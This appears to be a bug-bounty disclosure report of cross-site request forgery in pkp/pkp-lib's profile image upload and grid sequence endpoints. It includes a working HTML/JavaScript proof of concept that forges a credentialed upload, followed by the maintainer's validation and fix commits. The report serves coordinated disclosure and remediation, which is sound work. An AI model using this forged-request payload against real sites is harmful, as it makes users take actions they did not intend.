Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on

Oct 16th 2021


Description

No CSRF in upload profile too: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:

/index.php/e/$$$call$$$/grid/settings/submission-checklist/submission-checklist-grid/save-sequence

/index.php/e/$$$call$$$/grid/settings/genre/genre-grid/save-sequence

POC for upload files

<html>
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://10.0.2.15:8000/index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = "true";
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; ; filename=\"cat.jpg\"\r\n" + 
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
          "-----------------------------moxieboundary1634260375680--\r\n"
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking users to change their user profile picture.

Occurences

no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back 2 months ago
We have contacted a member of the pkp/pkp-lib team and are waiting to hear back 2 months ago
We have contacted a member of the pkp/pkp-lib team and are waiting to hear back 2 months ago
haxatron modified their report
2 months ago
Alec Smecher validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher confirmed that a fix has been merged on 169885 2 months ago
Alec Smecher has been awarded the fix bounty
Alec Smecher
2 months ago

Maintainer


Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:

  • https://github.com/pkp/pkp-lib/commit/169885a1de6554b519f264b213d91d4847d1a088
  • https://github.com/pkp/pkp-lib/commit/30180492367caf94919d870032795b201952d9e2